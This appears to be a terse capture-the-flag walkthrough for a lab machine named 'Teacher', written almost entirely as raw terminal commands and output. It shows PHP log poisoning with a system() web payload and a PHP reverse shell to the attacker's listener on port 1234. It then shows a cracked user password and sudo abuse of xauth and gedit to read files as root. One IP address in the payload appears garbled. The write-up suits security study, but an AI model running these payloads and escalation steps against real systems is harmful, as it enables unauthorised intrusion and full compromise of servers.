teacher Wed, Sep 07, 2022 GET /access.php?id=<%3fphp+system($_GET['cmd'])%3b%3f> HTTP/1.1 writes parameter to log.php GET /log.php?cmd=php+-r+'$sock%3dfsockopen("10.10teacher.10.73",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1 ┌──(root💀kali)-[/opt/hmv/teacher] └─# nc -nvlp 1234 listening on [any] 1234 ... connect to [10.10.10.73] from (UNKNOWN) [10.10.10.122] 57378 /bin/sh: 0: cant access tty; job control turned off $ python3 -c 'import pty;pty.spawn("/bin/bash");' www-data@Teacher:/var/www/html$ ls -lash ls -lash total 5.3M 4.0K drwxr-xr-x 2 root root 4.0K Aug 26 19:39 . 4.0K drwxr-xr-x 3 root root 4.0K Aug 24 17:24 .. 4.0K -rw-r--r-- 1 root root 191 Aug 25 16:53 access.php 4.0K -rw-r--r-- 1 root root 48 Aug 26 19:39 clearlogs.php 5.1M -rw-r--r-- 1 mrteacher mrteacher 5.1M Aug 25 17:38 e14e1598b4271d8449e7fcda302b7975.pdf 4.0K -rw-r--r-- 1 root root 315 Aug 26 16:51 index.html 8.0K -rwxrwxrwx 1 root root 5.9K Sep 7 15:06 log.php 128K -rw-r--r-- 1 root root 128K Aug 26 16:39 rabbit.jpg www-data@Teacher:/var/www/html$ file e14e1598b4271d8449e7fcda302b7975.pdf file e14e1598b4271d8449e7fcda302b7975.pdf e14e1598b4271d8449e7fcda302b7975.pdf: PDF document, version 1.4 (password protected) password in pdf ┌──(root💀kali)-[/opt/hmv/teacher] └─# wget http://10.10.10.122/e14e1598b4271d8449e7fcda302b7975.pdf --2022-09-07 07:08:26-- http://10.10.10.122/e14e1598b4271d8449e7fcda302b7975.pdf Connecting to 10.10.10.122:80... connected. HTTP request sent, awaiting response... 200 OK Length: 5301604 (5.1M) [application/pdf] Saving to: ‘e14e1598b4271d8449e7fcda302b7975.pdf’ back on box www-data@Teacher:/var/www/html$ su mrteacher su mrteacher Password: ThankYouTeachers mrteacher@Teacher:/var/www/html$ sudo -l sudo -l Matching Defaults entries for mrteacher on Teacher: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User mrteacher may run the following commands on Teacher: (ALL : ALL) NOPASSWD: /bin/gedit, /bin/xauth ┌──(root💀kali)-[/opt/hmv/teacher] └─# ssh -X mrteacher@10.10.10.122 The authenticity of host '10.10.10.122 (10.10.10.122)' cant be established. ED25519 key fingerprint is SHA256:hShUum4jvn2yQa8RsN2brmvRwoUyIktGfCx1BfrAPQA. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.10.122' (ED25519) to the list of known hosts. mrteacher@10.10.10.122s password: Linux Teacher 5.10.0-17-amd64 #1 SMP Debian 5.10.136-1 (2022-08-13) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Mon Sep 5 17:55:42 2022 from 192.168.1.23 mrteacher@Teacher:~$ sudo -l Matching Defaults entries for mrteacher on Teacher: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User mrteacher may run the following commands on Teacher: (ALL : ALL) NOPASSWD: /bin/gedit, /bin/xauth mrteacher@Teacher:~$ sudo -u root /bin/gedit X11 connection rejected because of wrong authentication. Unable to init server: Could not connect: Connection refused (gedit:938): Gtk-WARNING **: 15:12:03.860: cannot open display: localhost:10.0 # https://www.ibm.com/support/pages/x11-forwarding-ssh-connection-rejected-because-wrong-authentication mrteacher@Teacher:~$ sudo -u root /bin/xauth add $(xauth -f ~mrteacher/.Xauthority list | tail -1) mrteacher@Teacher:~$ sudo -u root /bin/gedit gedit opens and we can read whatever we want as root